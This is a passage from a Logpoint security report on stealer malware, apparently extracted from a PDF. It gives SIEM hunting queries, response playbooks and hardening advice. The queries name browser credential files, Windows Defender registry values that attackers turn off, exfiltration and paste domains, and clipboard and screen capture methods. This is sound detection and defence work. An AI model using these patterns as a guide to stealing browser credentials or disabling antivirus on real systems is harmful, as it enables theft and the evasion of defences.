 detail="DWORD (0x00000001)" 
 target_object IN ["*\DisableAntiSpyware", "*\DisableAntiVirus", 
 "*\DisableBehaviorMonitoring", "*\DisableIntrusionPreventionSystem", 
 "*\DisableIOAVProtection", "*\DisableOnAccessProtection", 
 "*\DisableRealtimeMonitoring", "*\DisableScanOnRealtimeEnable", 
 "*\DisableScriptScanning", "*\DisableEnhancedNotifications", 
 "*\DisableBlockAtFirstSeen"] ) 
 OR 
 ( 
 detail="DWORD (0x00000000)" 
 target_object IN ["*\App and Browser protection\DisallowExploitProtectionOverride", 
 "*\Features\TamperProtection", "*\MpEngine\MpEnablePus", "*\PUAProtection", 
 "*\Signature Update\ForceUpdateFromMU", "*\SpyNet\SpynetReporting", 
 "*\SpyNet\SubmitSamplesConsent", 
 "*\Windows Defender Exploit Guard\Controlled Folder Access\EnableControlledFolderAccess"] 
 ) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 Also, we can use below query to hunt for Windows Registry key modifications indicative of attempts to disable various aspects of Windows Defender's real-time monitoring capabilities. 47www.logpoint.com Credential Access Browser Credential Accessed Stealer malware commonly targets browsers to steal sensitive data by accessing directories where such information is stored. Therefore, we can hunt for access to browser files (Chrome, Edge, Brave, Firefox) by processes other than the browser itself. Collection Screen Capture via CopyFromScreen As mentioned, the 'copyfromscreen' method is frequently employed for taking screenshots. We can use the query below to look for this method within script blocks. Clipboard Data Access Detected As one of the common methods for retrieving clipboard data is through the "Get-Clipboard" PowerShell cmdlet. We can use the following query to hunt for clipboard data access. label=File label=Access ((path IN ["*\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies*", "*\Appdata\Local\Chrome\User Data\Default\Login Data*", "*\AppData\Local\Google\Chrome\User Data\Local State*"] object_name IN ["*\Appdata\Local\Microsoft\Windows\WebCache\WebCacheV01.dat", "*\cookies.sqlite"]) OR object_name IN ["*\Microsoft\Edge\User Data\Default\Web Data", "*Firefox*release\logins.json","*firefox*release\key3.db", "*firefox*release\key4.db", "*\BraveSoftware\Brave-Browser\User Data*"]) -"process" IN ["*\firefox.exe", "*\chrome.exe","C:\Program Files\*", "C:\Program Files (x86)\*", "C:\WINDOWS\system32\*","*\MsMpEng.exe", "*\MpCopyAccelerator.exe", "*\thor64.exe","*\thor.exe"] -parent_process IN ["C:\Windows\System32\msiexec.exe"] -("process"=system parent_process=idle) "access"="Read*" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 NOTE: In the alert we have only supported the most used browsers, so to monitor for access of credential files of other browsers, you must include the credential file name and exclude the browser process name. To generate logs related to file operations, auditing must be enabled for the folders where the files are located. norm_id=WinServer event_id=4104 script_block="*.CopyFromScreen*"1 48www.logpoint.com Collection Screen Capture via CopyFromScreen As mentioned, the 'copyfromscreen' method is frequently employed for taking screenshots. We can use the query below to look for this method within script blocks. Command and Control Network Connection to Suspicious Server Threat Actors are frequently using platform like Telegram, Discord and Mastodon as command and control platforms. Therefore, we can use the query below to look for a connection associated with these platforms. Clipboard Data Access Detected As one of the common methods for retrieving clipboard data is through the "Get-Clipboard" PowerShell cmdlet. We can use the following query to hunt for clipboard data access. norm_id=WinServer event_id=4104 script_block="*.CopyFromScreen*"1 (label="process" label=create ("process"="*\clip.exe" OR file="clip.exe")) OR (script_block="*Get-Clipboard*" OR command="*Get-Clipboard*") 1 2 3 4 url IN ["*dl.dropboxusercontent.com*","*.pastebin.com*","*.githubusercontent.com*", "*cdn.discordapp.com/attachments*","*mediafire.com*","*userstorage.mega.co.nz*", "*mega.nz*","*ddns.net*","*.paste.ee*", "*.hastebin.com/raw/*","*.ghostbin.co/*", "*ufile.io*","*anonfiles.com*", "send.exploit.in*","*transfer.sh*", "*privatlab.net*", "*privatlab.com*","*sendspace.com*","*pastetext.net*","*pastebin.pl*","*paste.ee*", "*api.telegram.org*"] OR domain IN ["*dropboxusercontent.com*","*pastebin.com*","*.githubusercontent.com*", "*cdn.discordapp.com","*mediafire.com*","*userstorage.mega.co.nz", "*mega.nz*","*ddns.net","*.paste.ee", "*.hastebin.com","*ghostbin.co", "*ufile.io","*anonfiles.com", "send.exploit.in","transfer.sh", "privatlab.net", "*privatlab.com","*sendspace.com","*pastetext.net","*pastebin.pl","*paste.e*", "*api.telegram.org"] 1 2 3 4 5 6 7 8 9 10 11 12 49www.logpoint.com Exfiltration Suspicious Outbound SMTP Connection In some instance, AgentTesla has employed SMTP protocols for data exfiltration. Therefore, we can use the following query to hunt for network events where the destination port includes TCP ports 25, 587, 465, and 2525. To minimize false positives, mail clients such as Outlook and Thunderbird are excluded, as well as the default mail binary provided by Windows. (destination_port IN [20,21] OR source_port IN [20,21])1 norm_id=WindowsSysmon event_id=3 destination_port IN [25,587,465,2525] ( "process" IN ["*C: \Program Files\Microsoft\Exchange Server*", "*\thunderbird.exe", "*\outlook.exe","C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_*\HxTsr.exe" 1 2 3 Also, Agent Tesla has exfiltrated data leveraging FTP, we can use the query below to look for network events where the destination or source port contains either TCP port 20 or 21. This query detects FTP connections which can be further filtered to detect an abnormal connection to a host. 50www.logpoint.com Investigation and Response using Logpoint Converged SIEM Logpoint Converged SIEM provides a comprehensive security operations platform that combines SIEM, SOAR, threat intelligence, and EDR capabilities with AgentX, our native endpoint agent. It provides automated real-time threat investigation and remediation, as well as detailed visibility into existing endpoints. Osquery enables advanced threat hunting and forensic investigations. AgentX detects and contains compromised systems quickly by continuously monitoring endpoints for indicators of compromise and malicious behavior. At Logpoint, our dedicated team of security researchers works tirelessly to ensure that our platform can effectively detect and prevent emerging threats such stealer malware. Through continuous development and refinement of prebuilt playbooks within Logpoint Converged SIEM, we strive to stay ahead of evolving attack techniques and provide robust defenses against such threats. Phishing Investigation and Response Phishing remains one of the most common forms of cybercrime, with an estimated 3.4 billion spam emails sent every day. It serves as one of the primary attack vector for Stealer malware. Leveraging human emotions such as greed, fear, and desire, attackers exploit vulnerabilities through social engineering tactics, often via email-based schemes. This playbook will investigate and respond to suspicious phishing incidents, minimizing response time and reducing the risk of human error. In recent times, phishing attacks have evolved to include QR codes, a tactic known as 'Quishing'. It is very difficult to detect by the email security gateway and is easily passed on to the user. To counteract with such threat, we have a playbook called "Email Forensics - Lite". This playbook provides a range of actions and scripts to extract as much detail as possible, such as sender IP details, URL details, and attachment details, including QR data, after which it scans for and decodes the QR code in the attached image. If the data includes a URL, it will be treated as an artifact. The extracted IP and URL information is enhanced with threat intelligence sources such as VirusTotal and RecordedFuture. https://www.logpoint.com/en/blog/emerging-threats/email-investigation-and-response-using-logpoint/ 51www.logpoint.com Osquery Investigate host This playbook retrieves essential host information including the operating system version, system uptime, logged-in users, startup items, firewall status, security patch details, and more. This data can then be utilized to feed different response playbooks. This playbook aids in identifying malicious processes by querying them in VirusTotal, detecting any established network connections which could be indication of backdoor. The Osquery Investigate Process playbook can also be used to retrieve process communication information and DLL load information to determine the loading of any suspicious DLL. 52www.logpoint.com Malicious File Containment Given that phishing is a major vector for cyberattacks, often involving weaponized attachments used in conjunction with social engineering techniques to trick victims into executing them. Furthermore, in every case, additional files are dropped in a location where it can blend in with normal operation. This playbook covers the investigation and containment of such malicious binaries once they have been dropped on the system. It compares the hash of the dropped file with threat intelligence sources, and if they are found to be malicious, the linked processes are terminated, and the file is removed. This playbook looks for that hash in other endpoints to identify potentially infected machines and takes exact steps if it is found. To carry out these activities, the playbook makes use of the "AgentX Terminate Process" and "AgentX Remove Item" playbooks, which enable analysts to effectively terminate malicious processes and delete malicious files from infected machines reducing MTTR. 53www.logpoint.com Disable Schedule Task Most malware leverages schedule task o remain persistent. We can use this playbook to disable suspicious Schedule Task. Possible Command and Control Adversaries rely heavily on command and control (C2) communication to maintain control over compromised systems. This playbook is intended to detect C2 server communication. It employs a threat intelligence platform to evaluate IP, source address, and domain reputation. It also employs entropy to identify domains with random domain names. When malicious C2 is detected, it can block the associated server addresses or domains. 54www.logpoint.com Conduct Security Awareness Training Regularly Use Updated Security Software
 Enforce Strong Password Policy
 Implement Multi-factor Authentication
 Phishing is one of the primary methods for delivering Stealer malware. Social engineering techniques such as phishing, smishing, pretexting, and baiting deceive employees into downloading and executing malware, disclosing confidential information, or performing unauthorized actions. To combat these threats, organizations should train employees regularly on recognizing and responding to social engineering attacks such as phishing emails, including simulated exercises that mimic real-world scenarios. These simulations assist in identifying susceptible employees, and organizations can provide them with the additional training and support they require in the future to recognize and respond to such threats. Furthermore, if employees suspect they have been the victim of a social engineering attack, a formal process or path should be provided for them to report it, including alerting the appropriate authorities and taking immediate steps to contain the incident and minimize any potential damage. Despite the critical importance of regularly updating devices, browsers, and other software applications, many organizations neglect this security practice, leaving their systems vulnerable to known vulnerabilities and cyber threats. Organizations can significantly reduce the risk of malware infections and data breaches by keeping software updated and ensuring the installation of the latest security patches and bug fixes. In cases where patching is unavailable or not feasible, organizations should utilize vendors' mitigations. Additionally, when faced with numerous security issues, organizations should prioritize them based on severity and apply patches or mitigations accordingly.

 Organizations should enforce strong password policies to enhance security measures within organizations. These policies typically incorporate with a minimum password length of eight characters, limit the number of password attempts before account lockout.

 Furthermore, it is also recommended for organizations to refrain from mandating frequent password resets for their employees, limiting them not more than once per year. Additionally, organizations should implement a policy to monitor newly set passwords. These passwords should be checked against lists of common and compromised passwords to ensure their strength and integrity. Implementing Multi-Factor Authentication (MFA) is crucial for bolstering security measures against unauthorized access to user accounts, particularly in scenarios where passwords may be compromised. Organizations are strongly advised to deploy MFA across all user accounts, with particular emphasis on remote access or cloud-based services. Additionally, configuring MFA to be mandatory for performing privileged actions is highly recommended for enhancing overall security posture. Recommendation 55www.logpoint.com Implement Network Segmentation
 Use Cyber Security Solutions Backup and Disaster Recovery Planning
 Enable Proper Logging and Visibility Proper Incident Response Plan Perform network segmentation to keep essential systems and sensitive data apart from the rest of the network. This helps to confine possible breaches and minimize attacker lateral movement. Use cybersecurity solutions such as firewalls, intrusion detection systems, and DDoS protection tools to prevent unauthorized access attempts and identify botnet activities. In addition, implement an Endpoint Protection Platform for host-level security. Host-level security solutions like AgentX can help detect and prevent malware infections, including stealer malware. These solutions can provide an additional layer of protection to your devices by monitoring the activity of processes and services running on your device and alerting you to any suspicious or malicious activity. Regularly backing up your important data is essential to safeguard against data loss and security breaches. However, relying on a single backup copy may not suffice to ensure the safety of your data. The 3-2-1 backup policy recommends creating three copies of your critical data, storing them in two different formats or locations, and keeping one copy offsite. Having an offline backup, inaccessible from the internet, is a vital component of a robust backup strategy. While online backups offer quick access to your data, offline backups provide an additional layer of protection against data loss. This comprehensive approach ensures redundancy and enables swift recovery from data loss resulting from hardware failures, malware infections, natural disasters, or other unforeseen circumstances.

 Proper logging, asset visibility, and system monitoring are essential components of a robust cybersecurity strategy. These measures provide an overview of the network and help detect anomalies indicating a security threat. These practices play an important role in detecting and preventing attacks in their early stages, enhancing overall cybersecurity posture. It is also crucial to ensure that logs are being collected from every system to ensure comprehensive coverage. Develop and consistently implement an incident response plan to address security incidents promptly and efficiently. Conducting regular incident response drills is equally important to assess an organization's readiness to handle security incidents effectively. These drills help identify any gaps in the incident response plan and enhance the organization's preparedness to respond to real-world incidents. 56www.logpoint.com Stealer malware poses a significant threat to an organizations as the proliferation of stealer malware is expected to continue growing through its expansion and availability on underground markets. Consequently, it is imperative for organizations to proactively adapt and enhance their security measures to counter this emerging threat effectively. Logpoint Converged SIEM provides a comprehensive set of tools and capabilities for detecting, analyzing, and mitigating the impact of stealer malware. It enables security teams to automate key incident response procedures, collect critical logs and data, and enhance malware detection and removal operations. Logpoint Converged SIEM, which includes investigation and response playbooks as well as AgentX, our native endpoint agent, provides organizations with the tools they need to monitor risks, strengthen defenses, and protect against stealer malware activities in today's dynamic threat landscape. At Logpoint, we remain vigilant and committed to preventing such attacks. We continually research and develop new alerts for Logpoint Converged SIEM and integrate new playbooks to address emerging threats like stealer malware. Together, we can effectively combat these evolving cybersecurity challenges. Happy hunting! Conclusion www.logpoint.com About Logpoint Logpoint is the creator of a reliable, innovative cybersecurity operations platform — empowering organizations worldwide to thrive in a world of evolving threats. By combining sophisticated technology and a profound understanding of customer challenges, Logpoint bolsters security teams’ capabilities while helping them combat current and future threats. Logpoint offers SIEM, UEBA, and SOAR technologies in a complete platform that efficiently detects threats, minimizes false positives, autonomously prioritizes risks, responds to incidents, and much more. Headquartered in Copenhagen, Denmark, with offices around the world, Logpoint is a multinational, multicultural, and inclusive company. For more information visit www.logpoint.com https://www.logpoint.com/en/